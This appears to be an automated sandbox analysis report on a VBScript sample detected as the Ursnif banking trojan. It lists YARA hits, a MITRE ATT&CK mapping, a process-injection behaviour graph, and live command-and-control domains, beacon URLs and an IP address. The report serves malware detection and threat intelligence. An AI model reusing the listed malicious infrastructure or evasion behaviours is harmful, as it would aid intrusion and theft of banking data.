                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: cports.exe
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: icesword.exe
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: regshot.exe

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1Windows Management Instrumentation221Valid Accounts1Valid Accounts1Disable or Modify Tools1Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                    Default AccountsScripting121Boot or Logon Initialization ScriptsAccess Token Manipulation1Scripting121LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsNative API2Logon Script (Windows)Process Injection913Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsExploitation for Client Execution1Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSSystem Information Discovery46Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter1Network Logon ScriptNetwork Logon ScriptRootkit4LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaPowerShell1Rc.commonRc.commonMasquerading11Cached Domain CredentialsSecurity Software Discovery131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsValid Accounts1DCSyncVirtualization/Sandbox Evasion41Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobModify Registry1Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Virtualization/Sandbox Evasion41Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection913Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Compromise Software Supply ChainUnix ShellLaunchdLaunchdRundll321KeyloggingSystem Network Configuration Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 481077 Sample: 345678.vbs Startdate: 10/09/2021 Architecture: WINDOWS Score: 100 66 art.microsoftsofymicrosoftsoft.at 2->66 68 resolver1.opendns.com 2->68 72 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->72 74 Multi AV Scanner detection for domain / URL 2->74 76 Found malware configuration 2->76 78 12 other signatures 2->78 10 mshta.exe 19 2->10         started        13 WmiPrvSE.exe 2->13         started        15 wscript.exe 2 2->15         started        18 2 other processes 2->18 signatures3 process4 file5 98 Suspicious powershell command line found 10->98 20 powershell.exe 2 32 10->20         started        24 rundll32.exe 13->24         started        64 C:\Users\user\AppData\Local\Temp\fum.cpp, PE32 15->64 dropped 100 Benign windows process drops PE files 15->100 102 VBScript performs obfuscated calls to suspicious functions 15->102 104 Deletes itself after installation 15->104 106 Creates processes via WMI 15->106 signatures6 process7 file8 56 C:\Users\user\AppData\Local\...\wyozc5bn.0.cs, UTF-8 20->56 dropped 58 C:\Users\user\AppData\...\uitt4j30.cmdline, UTF-8 20->58 dropped 80 Injects code into the Windows Explorer (explorer.exe) 20->80 82 Writes to foreign memory regions 20->82 84 Modifies the context of a thread in another process (thread injection) 20->84 86 3 other signatures 20->86 26 explorer.exe 20->26 injected 29 csc.exe 3 20->29         started        32 csc.exe 20->32         started        34 conhost.exe 20->34         started        36 rundll32.exe 1 24->36         started        signatures9 process10 dnsIp11 108 Changes memory attributes in foreign processes to executable or writable 26->108 110 Maps a DLL or memory area into another process 26->110 112 Disables SPDY (HTTP compression, likely to perform web injects) 26->112 114 Creates a thread in another existing process (thread injection) 26->114 39 cmd.exe 26->39         started        42 RuntimeBroker.exe 26->42 injected 60 C:\Users\user\AppData\Local\...\uitt4j30.dll, PE32 29->60 dropped 44 cvtres.exe 29->44         started        62 C:\Users\user\AppData\Local\...\wyozc5bn.dll, PE32 32->62 dropped 46 cvtres.exe 32->46         started        70 atl.bigbigpoppa.com 185.251.90.253, 49787, 49788, 49789 SPRINTHOSTRU Russian Federation 36->70 116 System process connects to network (likely due to code injection or exploit) 36->116 118 Writes to foreign memory regions 36->118 120 Allocates memory in foreign processes 36->120 122 2 other signatures 36->122 48 control.exe 36->48         started        file12 signatures13 process14 signatures15 88 Uses nslookup.exe to query domains 39->88 50 conhost.exe 39->50         started        52 nslookup.exe 39->52         started        90 Changes memory attributes in foreign processes to executable or writable 48->90 92 Writes to foreign memory regions 48->92 94 Allocates memory in foreign processes 48->94 96 3 other signatures 48->96 54 rundll32.exe 48->54         started        process16

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    No Antivirus matches

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    21.2.rundll32.exe.e50000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    art.microsoftsofymicrosoftsoft.at4%VirustotalBrowse
                    atl.bigbigpoppa.com9%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://constitution.org/usdeclar.txt0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://crl.m50%Avira URL Cloudsafe
                    https://contoso.com/0%URL Reputationsafe
                    http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                    http://www.microsoft.co0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                    http://atl.bigbigpoppa.com/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e100%Avira URL Cloudmalware
                    http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P100%Avira URL Cloudmalware
                    http://atl.bigbigpoppa.com/t100%Avira URL Cloudmalware
                    http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw100%Avira URL Cloudmalware
                    http://atl.bigbigpoppa.com/Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    resolver1.opendns.com
                    		208.67.222.222
                    		truefalse
                      		high
                      art.microsoftsofymicrosoftsoft.at
                      		185.251.90.253
                      		truetrueunknown
                      atl.bigbigpoppa.com
                      		185.251.90.253
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://atl.bigbigpoppa.com/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/etrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMwtrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://atl.bigbigpoppa.com/Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyTtrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpfalse
                        		high
                        http://constitution.org/usdeclar.txtrundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmpfalse
                          		high
                          http://crl.m5powershell.exe, 0000001F.00000003.646082530.00000217679BC000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpfalse
                            		high
                            http://constitution.org/usdeclar.txtC:rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.microsoft.copowershell.exe, 0000001F.00000003.643291434.0000021767840000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6Prundll32.exe, 00000015.00000003.618180759.00000000008E3000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://atl.bigbigpoppa.com/trundll32.exe, 00000015.00000002.737109785.000000000088A000.00000004.00000020.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001F.00000002.742877071.000002174F421000.00000004.00000001.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmpfalse
                                		high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                185.251.90.253
                                		art.microsoftsofymicrosoftsoft.atRussian Federation
                                		35278SPRINTHOSTRUtrue

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:481077
                                Start date:10.09.2021
                                Start time:09:53:09
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 11m 12s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:345678.vbs
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:42
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.bank.troj.evad.winVBS@29/21@5/1
                                EGA Information:
                                • Successful, ratio: 80%
                                HDC Information:
                                • Successful, ratio: 19.7% (good quality ratio 18.8%)
                                • Quality average: 80.3%
                                • Quality standard deviation: 28.7%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 173
                                • Number of non-executed functions: 206
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .vbs
                                • Override analysis time to 240s for JS/VBS files not yet terminated
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 23.211.4.86, 20.50.102.62, 40.112.88.60, 20.82.210.154, 80.67.82.211, 80.67.82.235, 20.54.110.249
